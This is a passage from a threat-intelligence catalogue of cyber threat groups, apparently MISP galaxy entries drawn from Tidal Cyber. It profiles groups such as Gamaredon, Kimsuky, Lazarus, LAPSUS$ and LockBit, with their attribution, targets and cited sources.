The tag is: misp-galaxy:groups="DEV-0157 - Associated Group"

Gamaredon Group

[Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) comes from a misspelling of the word "Armageddon", which was detected in the adversary’s early campaigns.<sup>[[Palo Alto Gamaredon Feb 2017](https://app.tidalcyber.com/references/3f9a6343-1db3-4696-99ed-f22c6eabee71)]</sup><sup>[[TrendMicro Gamaredon April 2020](https://app.tidalcyber.com/references/3800cfc2-0260-4b36-b629-7a336b9f9f10)]</sup><sup>[[ESET Gamaredon June 2020](https://app.tidalcyber.com/references/6532664d-2311-4b38-8960-f43762471729)]</sup><sup>[[Symantec Shuckworm January 2022](https://app.tidalcyber.com/references/3abb9cfb-8927-4447-b904-6ed071787bef)]</sup><sup>[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]</sup>

In November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) to Russia’s Federal Security Service (FSB) Center 18.<sup>[[Bleepingcomputer Gamardeon FSB November 2021](https://app.tidalcyber.com/references/c565b025-df74-40a9-9535-b630ca06f777)]</sup><sup>[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]</sup>

The tag is: misp-galaxy:groups="Gamaredon Group"

GCMAN

[GCMAN](https://app.tidalcyber.com/groups/dbc85db0-937d-47d7-9002-7364d41be48a) is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. <sup>[[Securelist GCMAN](https://app.tidalcyber.com/references/1f07f234-50f0-4c1e-942a-a01d3f733161)]</sup>

The tag is: misp-galaxy:groups="GCMAN"

Pinchy Spider - Associated Group

<sup>[[CrowdStrike Evolution of Pinchy Spider July 2021](https://app.tidalcyber.com/references/7578541b-1ae3-58d0-a8b9-120bd6cd96f5)]</sup>

The tag is: misp-galaxy:groups="Pinchy Spider - Associated Group"

GOLD SOUTHFIELD

[GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.<sup>[[Secureworks REvil September 2019](https://app.tidalcyber.com/references/8f4e2baf-4227-4bbd-bfdb-5598717dcf88)]</sup><sup>[[Secureworks GandCrab and REvil September 2019](https://app.tidalcyber.com/references/46b5d57b-17be-48ff-b723-406f6a55d84a)]</sup><sup>[[Secureworks GOLD SOUTHFIELD](https://app.tidalcyber.com/references/01d1ffaa-16b3-41c4-bb5a-afe2b41f1142)]</sup><sup>[[CrowdStrike Evolution of Pinchy Spider July 2021](https://app.tidalcyber.com/references/7578541b-1ae3-58d0-a8b9-120bd6cd96f5)]</sup>

The tag is: misp-galaxy:groups="GOLD SOUTHFIELD"

Gorgon Group

[Gorgon Group](https://app.tidalcyber.com/groups/efb3b5ac-cd86-44a2-9de1-02e4612b8cc2) is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. <sup>[[Unit 42 Gorgon Group Aug 2018](https://app.tidalcyber.com/references/d0605185-3f8d-4846-a718-15572714e15b)]</sup>

The tag is: misp-galaxy:groups="Gorgon Group"

Group5

[Group5](https://app.tidalcyber.com/groups/fcc6d937-8cd6-4f2c-adb8-48caedbde70a) is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. [Group5](https://app.tidalcyber.com/groups/fcc6d937-8cd6-4f2c-adb8-48caedbde70a) has used two commonly available remote access tools (RATs), [njRAT](https://app.tidalcyber.com/software/82996f6f-0575-45cd-8f7c-ba1b063d5b9f) and [NanoCore](https://app.tidalcyber.com/software/db05dbaa-eb3a-4303-b37e-18d67e7e85a1), as well as an Android RAT, DroidJack. <sup>[[Citizen Lab Group5](https://app.tidalcyber.com/references/ffbec5e8-947a-4363-b7e1-812dfd79935a)]</sup>

The tag is: misp-galaxy:groups="Group5"

Operation Exchange Marauder - Associated Group

<sup>[[Volexity Exchange Marauder March 2021](https://app.tidalcyber.com/references/ef0626e9-281c-4770-b145-ffe36e18e369)]</sup>

The tag is: misp-galaxy:groups="Operation Exchange Marauder - Associated Group"

HAFNIUM

[HAFNIUM](https://app.tidalcyber.com/groups/1bcc9382-ccfe-4b04-91f3-ef1250df5e5b) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://app.tidalcyber.com/groups/1bcc9382-ccfe-4b04-91f3-ef1250df5e5b) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.<sup>[[Microsoft HAFNIUM March 2020](https://app.tidalcyber.com/references/6a986c46-79a3-49c6-94d2-d9b1f5db08f3)]</sup><sup>[[Volexity Exchange Marauder March 2021](https://app.tidalcyber.com/references/ef0626e9-281c-4770-b145-ffe36e18e369)]</sup>

The tag is: misp-galaxy:groups="HAFNIUM"

Lyceum - Associated Group

The tag is: misp-galaxy:groups="Lyceum - Associated Group"

Siamesekitten - Associated Group

<sup>[[ClearSky Siamesekitten August 2021](https://app.tidalcyber.com/references/9485efce-8d54-4461-b64e-0d15e31fbf8c)]</sup>

The tag is: misp-galaxy:groups="Siamesekitten - Associated Group"

Spirlin - Associated Group

<sup>[[Accenture Lyceum Targets November 2021](https://app.tidalcyber.com/references/127836ce-e459-405d-a75c-32fd5f0ab198)]</sup>

The tag is: misp-galaxy:groups="Spirlin - Associated Group"

HEXANE

[HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735)'s TTPs appear similar to [APT33](https://app.tidalcyber.com/groups/99bbbe25-45af-492f-a7ff-7cbc57828bac) and [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2) but due to differences in victims and tools it is tracked as a separate entity.<sup>[[Dragos Hexane](https://app.tidalcyber.com/references/11838e67-5032-4352-ad1f-81ba0398a14f)]</sup><sup>[[Kaspersky Lyceum October 2021](https://app.tidalcyber.com/references/b3d13a82-c24e-4b47-b47a-7221ad449859)]</sup><sup>[[ClearSky Siamesekitten August 2021](https://app.tidalcyber.com/references/9485efce-8d54-4461-b64e-0d15e31fbf8c)]</sup><sup>[[Accenture Lyceum Targets November 2021](https://app.tidalcyber.com/references/127836ce-e459-405d-a75c-32fd5f0ab198)]</sup>

The tag is: misp-galaxy:groups="HEXANE"

Higaisa

[Higaisa](https://app.tidalcyber.com/groups/f1477581-d485-403f-a95f-c56bf88c5d1e) is a threat group suspected to have South Korean origins. [Higaisa](https://app.tidalcyber.com/groups/f1477581-d485-403f-a95f-c56bf88c5d1e) has targeted government, public, and trade organizations in North Korea; however, they have also carried out attacks in China, Japan, Russia, Poland, and other nations. [Higaisa](https://app.tidalcyber.com/groups/f1477581-d485-403f-a95f-c56bf88c5d1e) was first disclosed in early 2019 but is assessed to have operated as early as 2009.<sup>[[Malwarebytes Higaisa 2020](https://app.tidalcyber.com/references/6054e0ab-cf61-49ba-b7f5-58b304477451)]</sup><sup>[[Zscaler Higaisa 2020](https://app.tidalcyber.com/references/26d7ee2c-d4f7-441a-9073-49c9049b017e)]</sup><sup>[[PTSecurity Higaisa 2020](https://app.tidalcyber.com/references/cf8f3d9c-0d21-4587-a707-46848a15bd46)]</sup>

The tag is: misp-galaxy:groups="Higaisa"

Inception Framework - Associated Group

<sup>[[Symantec Inception Framework March 2018](https://app.tidalcyber.com/references/166f5c44-7d8c-45d5-8d9f-3b8bd21a2af3)]</sup>

The tag is: misp-galaxy:groups="Inception Framework - Associated Group"

Cloud Atlas - Associated Group

<sup>[[Kaspersky Cloud Atlas December 2014](https://app.tidalcyber.com/references/41a9b3e3-0953-4bde-9e1d-c2f51de1120e)]</sup>

The tag is: misp-galaxy:groups="Cloud Atlas - Associated Group"

Inception

[Inception](https://app.tidalcyber.com/groups/d7c58e7f-f0b0-44c6-b205-5adcfb56f0e6) is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East.<sup>[[Unit 42 Inception November 2018](https://app.tidalcyber.com/references/5cb98fce-f386-4878-b69c-5c6440ad689c)]</sup><sup>[[Symantec Inception Framework March 2018](https://app.tidalcyber.com/references/166f5c44-7d8c-45d5-8d9f-3b8bd21a2af3)]</sup><sup>[[Kaspersky Cloud Atlas December 2014](https://app.tidalcyber.com/references/41a9b3e3-0953-4bde-9e1d-c2f51de1120e)]</sup>

The tag is: misp-galaxy:groups="Inception"

IndigoZebra

[IndigoZebra](https://app.tidalcyber.com/groups/988f5312-834e-48ea-93b7-e6e01ee0938d) is a suspected Chinese cyber espionage group that has been targeting Central Asian governments since at least 2014.<sup>[[HackerNews IndigoZebra July 2021](https://app.tidalcyber.com/references/fcf8265a-3084-4162-87d0-9e77c0a5cff0)]</sup><sup>[[Checkpoint IndigoZebra July 2021](https://app.tidalcyber.com/references/cf4a8c8c-eab1-421f-b313-344aed03b42d)]</sup><sup>[[Securelist APT Trends Q2 2017](https://app.tidalcyber.com/references/fe28042c-d289-463f-9ece-1a75a70b966e)]</sup>

The tag is: misp-galaxy:groups="IndigoZebra"

Evil Corp - Associated Group

The tag is: misp-galaxy:groups="Evil Corp - Associated Group"

Indrik Spider

[Indrik Spider](https://app.tidalcyber.com/groups/3c7ad595-1940-40fc-b9ca-3e649c1e5d87) is a Russia-based cybercriminal group that has been active since at least 2014. [Indrik Spider](https://app.tidalcyber.com/groups/3c7ad595-1940-40fc-b9ca-3e649c1e5d87) initially started with the [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d), [WastedLocker](https://app.tidalcyber.com/software/0ba6ee8d-2b29-4980-8e55-348ea05f00ad), and Hades ransomware. Following U.S. sanctions and an indictment in 2019, [Indrik Spider](https://app.tidalcyber.com/groups/3c7ad595-1940-40fc-b9ca-3e649c1e5d87) changed their tactics and diversified their toolset.<sup>[[Crowdstrike Indrik November 2018](https://app.tidalcyber.com/references/0f85f611-90db-43ba-8b71-5d0d4ec8cdd5)]</sup><sup>[[Crowdstrike EvilCorp March 2021](https://app.tidalcyber.com/references/4b77d313-ef3c-4d2f-bfde-609fa59a8f55)]</sup><sup>[[Treasury EvilCorp Dec 2019](https://app.tidalcyber.com/references/074a52c4-26d9-4083-9349-c14e2639c1bc)]</sup>

The tag is: misp-galaxy:groups="Indrik Spider"

Vixen Panda - Associated Group

The tag is: misp-galaxy:groups="Vixen Panda - Associated Group"

Playful Dragon - Associated Group

The tag is: misp-galaxy:groups="Playful Dragon - Associated Group"

APT15 - Associated Group

<sup>[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]</sup>

The tag is: misp-galaxy:groups="APT15 - Associated Group"

Mirage - Associated Group

<sup>[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]</sup>

The tag is: misp-galaxy:groups="Mirage - Associated Group"

GREF - Associated Group

<sup>[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]</sup>

The tag is: misp-galaxy:groups="GREF - Associated Group"

RoyalAPT - Associated Group

The tag is: misp-galaxy:groups="RoyalAPT - Associated Group"

NICKEL - Associated Group

The tag is: misp-galaxy:groups="NICKEL - Associated Group"

Ke3chang

[Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8) is a threat group attributed to actors operating out of China. [Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8) has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010.<sup>[[Mandiant Operation Ke3chang November 2014](https://app.tidalcyber.com/references/bb45cf96-ceae-4f46-a0f5-08cd89f699c9)]</sup><sup>[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]</sup><sup>[[APT15 Intezer June 2018](https://app.tidalcyber.com/references/0110500c-bf67-43a5-97cb-16eb6c01040b)]</sup><sup>[[Microsoft NICKEL December 2021](https://app.tidalcyber.com/references/29a46bb3-f514-4554-ad9c-35f9a5ad9870)]</sup>

The tag is: misp-galaxy:groups="Ke3chang"

Killnet

Killnet is an apparent hacktivist collective that has primarily used distributed denial of service (DDoS) attacks in support of its ideology, which appears to largely align with Russian state interests. The group emerged in October 2021, initially offering DDoS capabilities as a for-hire service. However, after the February 2022 Russian invasion of Ukraine, Killnet explicitly pledged allegiance to Russia and began to threaten and claim responsibility for attacks on targets in Ukraine and in countries perceived to support Ukraine. To date, the group has claimed and is believed to be responsible for a considerable number of DDoS attacks on government and private sector targets in a range of sectors, using a variety of discrete techniques to carry them out. It is also believed to be behind a smaller number of data exfiltration-focused attacks, and it has promoted the use of defacement tools in its communication channels with supporters.<sup>[[Flashpoint Glossary Killnet](/references/502cc03b-350b-4e2d-9436-364c43a0a203)]</sup>

In October 2023, following a series of air- and land-based attacks in the Gaza Strip, researchers observed Killnet claiming responsibility for disruptive attacks against computer networks in Israel and pledging explicit support for Palestinian interests.<sup>[[RyanW3stman Tweet October 10 2023](/references/cfd0ad64-54b2-446f-9624-9c90a9a94f52)]</sup>

The tag is: misp-galaxy:groups="Killnet"

STOLEN PENCIL - Associated Group

<sup>[[Netscout Stolen Pencil Dec 2018](https://app.tidalcyber.com/references/6d3b31da-a784-4da0-91dd-b72c04fd520a)]</sup>

The tag is: misp-galaxy:groups="STOLEN PENCIL - Associated Group"

Thallium - Associated Group

The tag is: misp-galaxy:groups="Thallium - Associated Group"

Black Banshee - Associated Group

The tag is: misp-galaxy:groups="Black Banshee - Associated Group"

Velvet Chollima - Associated Group

The tag is: misp-galaxy:groups="Velvet Chollima - Associated Group"

Kimsuky

[Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the United States, Russia, Europe, and the UN. [Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.<sup>[[EST Kimsuky April 2019](https://app.tidalcyber.com/references/8e52db6b-5ac3-448a-93f6-96a21787a346)]</sup><sup>[[BRI Kimsuky April 2019](https://app.tidalcyber.com/references/b72dd3a1-62ca-4a05-96a8-c4bddb17db50)]</sup><sup>[[Cybereason Kimsuky November 2020](https://app.tidalcyber.com/references/ecc2f5ad-b2a8-470b-b919-cb184d12d00f)]</sup><sup>[[Malwarebytes Kimsuky June 2021](https://app.tidalcyber.com/references/9a497c56-f1d3-4889-8c1a-14b013f14668)]</sup><sup>[[CISA AA20-301A Kimsuky](https://app.tidalcyber.com/references/685aa213-7902-46fb-b90a-64be5c851f73)]</sup>

[Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).<sup>[[Netscout Stolen Pencil Dec 2018](https://app.tidalcyber.com/references/6d3b31da-a784-4da0-91dd-b72c04fd520a)]</sup><sup>[[EST Kimsuky SmokeScreen April 2019](https://app.tidalcyber.com/references/15213a3c-1e9f-47fa-9864-8ef2707c7fb6)]</sup><sup>[[AhnLab Kimsuky Kabar Cobra Feb 2019](https://app.tidalcyber.com/references/4035e871-9291-4d7f-9c5f-d8482d4dc8a7)]</sup>

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:groups="Kimsuky"

DEV-0537 - Associated Group

The tag is: misp-galaxy:groups="DEV-0537 - Associated Group"

LAPSUS$

[LAPSUS$](https://app.tidalcyber.com/groups/0060bb76-6713-4942-a4c0-d4ae01ec2866) is cyber criminal threat group that has been active since at least mid-2021. [LAPSUS$](https://app.tidalcyber.com/groups/0060bb76-6713-4942-a4c0-d4ae01ec2866) specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.<sup>[[BBC LAPSUS Apr 2022](https://app.tidalcyber.com/references/6c9f4312-6c9d-401c-b20f-12ce50c94a96)]</sup><sup>[[MSTIC DEV-0537 Mar 2022](https://app.tidalcyber.com/references/a9ce7e34-6e7d-4681-9869-8e8f2b5b0390)]</sup><sup>[[UNIT 42 LAPSUS Mar 2022](https://app.tidalcyber.com/references/50f4c1ed-b046-405a-963d-a113324355a3)]</sup>

The tag is: misp-galaxy:groups="LAPSUS$"

HIDDEN COBRA - Associated Group

The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.<sup>[[US-CERT HIDDEN COBRA June 2017](https://app.tidalcyber.com/references/8e57cea3-ee37-4507-bb56-7445050ec8ca)]</sup><sup>[[US-CERT HOPLIGHT Apr 2019](https://app.tidalcyber.com/references/e722b71b-9042-4143-a156-489783d86e0a)]</sup>

The tag is: misp-galaxy:groups="HIDDEN COBRA - Associated Group"

Labyrinth Chollima - Associated Group

<sup>[[CrowdStrike Labyrinth Chollima Feb 2022](https://app.tidalcyber.com/references/ffe31bbf-a40d-4285-96a0-53c54298a680)]</sup>

The tag is: misp-galaxy:groups="Labyrinth Chollima - Associated Group"

Guardians of Peace - Associated Group

The tag is: misp-galaxy:groups="Guardians of Peace - Associated Group"

ZINC - Associated Group

<sup>[[Microsoft ZINC disruption Dec 2017](https://app.tidalcyber.com/references/99831838-fc8f-43fa-9c87-6ccdf5677c34)]</sup>

The tag is: misp-galaxy:groups="ZINC - Associated Group"

NICKEL ACADEMY - Associated Group

<sup>[[Secureworks NICKEL ACADEMY Dec 2017](https://app.tidalcyber.com/references/aa7393ad-0760-4f27-a068-17beba17bbe3)]</sup>

The tag is: misp-galaxy:groups="NICKEL ACADEMY - Associated Group"

Diamond Sleet - Associated Group

The tag is: misp-galaxy:groups="Diamond Sleet - Associated Group"

Lazarus Group

[Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.<sup>[[US-CERT HIDDEN COBRA June 2017](https://app.tidalcyber.com/references/8e57cea3-ee37-4507-bb56-7445050ec8ca)]</sup><sup>[[Treasury North Korean Cyber Groups September 2019](https://app.tidalcyber.com/references/54977bb2-2929-41d7-bdea-06d39dc76174)]</sup> The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. <sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup>

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups, such as [Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46), [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66), [APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b), and [Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1).

The tag is: misp-galaxy:groups="Lazarus Group"

LazyScripter

[LazyScripter](https://app.tidalcyber.com/groups/12279b62-289e-49ee-97cb-c780edd3d091) is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.<sup>[[MalwareBytes LazyScripter Feb 2021](https://app.tidalcyber.com/references/078837a7-82cd-4e26-9135-43b612e911fe)]</sup>

The tag is: misp-galaxy:groups="LazyScripter"

Raspite - Associated Group

The tag is: misp-galaxy:groups="Raspite - Associated Group"

Leafminer

[Leafminer](https://app.tidalcyber.com/groups/b5c28235-d441-40d9-8da2-d49ba2f2568b) is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017. <sup>[[Symantec Leafminer July 2018](https://app.tidalcyber.com/references/01130af7-a2d4-435e-8790-49933e041451)]</sup>

The tag is: misp-galaxy:groups="Leafminer"

Kryptonite Panda - Associated Group

<sup>[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)]</sup><sup>[[Crowdstrike KRYPTONITE PANDA August 2018](https://app.tidalcyber.com/references/42fe94f5-bc4c-4b0b-9c35-0bc32cbc5d79)]</sup>

The tag is: misp-galaxy:groups="Kryptonite Panda - Associated Group"

BRONZE MOHAWK - Associated Group

The tag is: misp-galaxy:groups="BRONZE MOHAWK - Associated Group"

APT40 - Associated Group

FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.<sup>[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)]</sup><sup>[[Proofpoint Leviathan Oct 2017](https://app.tidalcyber.com/references/f8c2b67b-c097-4b48-8d95-266a45b7dd4d)]</sup><sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup><sup>[[FireEye APT40 March 2019](https://app.tidalcyber.com/references/8a44368f-3348-4817-aca7-81bfaca5ae6d)]</sup>

The tag is: misp-galaxy:groups="APT40 - Associated Group"

MUDCARP - Associated Group

The tag is: misp-galaxy:groups="MUDCARP - Associated Group"

Gadolinium - Associated Group

The tag is: misp-galaxy:groups="Gadolinium - Associated Group"

TEMP.Jumper - Associated Group

[Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.<sup>[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)]</sup><sup>[[FireEye APT40 March 2019](https://app.tidalcyber.com/references/8a44368f-3348-4817-aca7-81bfaca5ae6d)]</sup>

The tag is: misp-galaxy:groups="TEMP.Jumper - Associated Group"

TEMP.Periscope - Associated Group

[Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.<sup>[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)]</sup><sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup><sup>[[FireEye APT40 March 2019](https://app.tidalcyber.com/references/8a44368f-3348-4817-aca7-81bfaca5ae6d)]</sup>

The tag is: misp-galaxy:groups="TEMP.Periscope - Associated Group"

Leviathan

[Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security’s (MSS) Hainan State Security Department and an affiliated front company.<sup>[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)]</sup> Active since at least 2009, [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.<sup>[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)]</sup><sup>[[Proofpoint Leviathan Oct 2017](https://app.tidalcyber.com/references/f8c2b67b-c097-4b48-8d95-266a45b7dd4d)]</sup><sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup>

The tag is: misp-galaxy:groups="Leviathan"

Water Selkie - Associated Group

<sup>[[Trend Micro LockBit Spotlight February 08 2023](/references/f72dade0-ec82-40e7-96a0-9f124d59bd35)]</sup>

The tag is: misp-galaxy:groups="Water Selkie - Associated Group"

LockBit Ransomware Actors & Affiliates

This object represents the LockBit Ransomware-as-a-Service ("RaaS") apex group and the behaviors associated with its various affiliate ransomware operators. Specific affiliate operations defined by the research community will be tracked as separate objects.

Ransomware labeled "LockBit" was first observed in 2020. LockBit developers have introduced multiple versions of the LockBit encryption tool. According to the U.S. Cybersecurity and Infrastructure Security Agency ("CISA"), the following major LockBit variants have been observed (first-observed dates in parentheses): ABCD (LockBit malware’s predecessor; September 2019), LockBit (January 2020), LockBit 2.0 (June 2021), LockBit Linux-ESXi Locker (October 2021), LockBit 3.0 (March 2022), LockBit Green (a variant that incorporates source code from Conti ransomware; January 2023), and variants capable of targeting macOS environments (April 2023). As of June 2023, CISA reported that the web panel that offers affiliates access to LockBit malware explicitly listed the LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker variants.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

Since emerging in 2020, the LockBit group and its affiliates have carried out a very large number of attacks involving a wide range of victims around the world. In June 2023, the U.S. Federal Bureau of Investigation reported it had identified 1,700 LockBit attacks since 2020.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup> According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, LockBit actors publicly claimed 970 victims in 2022 (576 associated with the LockBit 2.0 variant and 394 associated with LockBit 3.0), the most of any extortion threat that year. Through April 2023, LockBit had claimed 406 victims, more than double the number of the next threat (Clop, with 179 victims).<sup>[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]</sup> CISA reported in June 2023 that U.S. ransoms paid to LockBit since January 2020 totaled $91 million.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

LockBit affiliate operators are known to use a wide variety of techniques during their attacks. Initial access for LockBit infections has occurred via most methods (including a number of vulnerability exploits), and operators are known to abuse a range of free and open-source software tools for a variety of post-exploitation activities. In addition to victim data encryption, LockBit actors routinely exfiltrate victim data and threaten to leak this data for extortion purposes.

Related Vulnerabilities: CVE-2021-22986, CVE-2023-0669, CVE-2023-27350, CVE-2021-44228, CVE-2021-22986, CVE-2020-1472, CVE-2019-0708, CVE-2018-13379<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:groups="LockBit Ransomware Actors & Affiliates"

Spring Dragon - Associated Group

The tag is: misp-galaxy:groups="Spring Dragon - Associated Group"

DRAGONFISH - Associated Group

The tag is: misp-galaxy:groups="DRAGONFISH - Associated Group"

Lotus Blossom

[Lotus Blossom](https://app.tidalcyber.com/groups/2849455a-cf39-4a9f-bd89-c2b3c1e5dd52) is a threat group that has targeted government and military organizations in Southeast Asia. <sup>[[Lotus Blossom Jun 2015](https://app.tidalcyber.com/references/46fdb8ca-b14d-43bd-a20f-cae7b26e56c6)]</sup>

The tag is: misp-galaxy:groups="Lotus Blossom"

LuminousMoth

